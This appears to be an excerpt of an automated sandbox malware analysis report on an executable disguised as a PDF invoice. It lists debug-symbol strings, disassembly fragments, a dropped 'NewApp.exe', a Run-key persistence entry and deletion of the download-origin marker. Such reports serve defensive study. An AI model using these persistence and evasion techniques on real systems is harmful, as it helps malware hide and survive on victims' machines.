                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb> source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: rasadhlp.pdb& source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbx source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: iVisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.PDB source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbn source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbw_ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb4 source: WerFault.exe, 0000000B.00000003.685897028.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb^ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdbL source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbF source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbh source: WerFault.exe, 0000001A.00000003.799925426.000000000523B000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb[ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: psapi.pdb!-0 source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb` source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdbt source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: ml.pdb&& source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: dhcpcsvc.pdbP source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb* source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBn^ source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdbr source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: .pdb8h source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbr source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdbrr source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbl.* source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: A4-058000200390-10-14_REV_pdf.PDBZ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E47A push ds; retf 0_2_00E9E47B
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E685 push ds; retf 0_2_00E9E65E
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E65C push ds; retf 0_2_00E9E65E
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E890 push ds; retf 0_2_00E9E891
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9EAEF push ds; retf 0_2_00E9EAF1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9EA18 push ds; retf 0_2_00E9EA19
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E97D59 pushad ; retf 0005h0_2_00E97D5A
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E99E51 push 00A405CAh; retf 0_2_00E99E56
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_05CE267B pushad ; retf 0_2_05CE2681
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AAA1C push es; iretd 8_2_063AAA1D
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A465E push cs; ret 8_2_063A4664
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AE431 push esi; iretd 8_2_063AE432
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AB58D push es; ret 8_2_063AB614
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A5187 push edi; retn 0000h8_2_063A5189
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_05FE2678 pushad ; retf 18_2_05FE2681
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_05632678 pushad ; retf 19_2_05632681
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D26BC0 push 5D5F5E5Bh; ret 24_2_04D26BA3
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3E431 push esi; iretd 24_2_05D3E432
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D35187 push edi; retn 0000h24_2_05D35189
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3AA1C push es; iretd 24_2_05D3AA1D
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06383697 push es; iretd 24_2_063836B8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06386FBC pushad ; retf 24_2_06386FBD
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063833C9 push ecx; iretd 24_2_063833CC
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638B1F6 push cs; ret 24_2_0638B1F7
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06431B98 push esi; ret 24_2_06431B9B
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeJump to dropped file
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewAppJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewAppJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
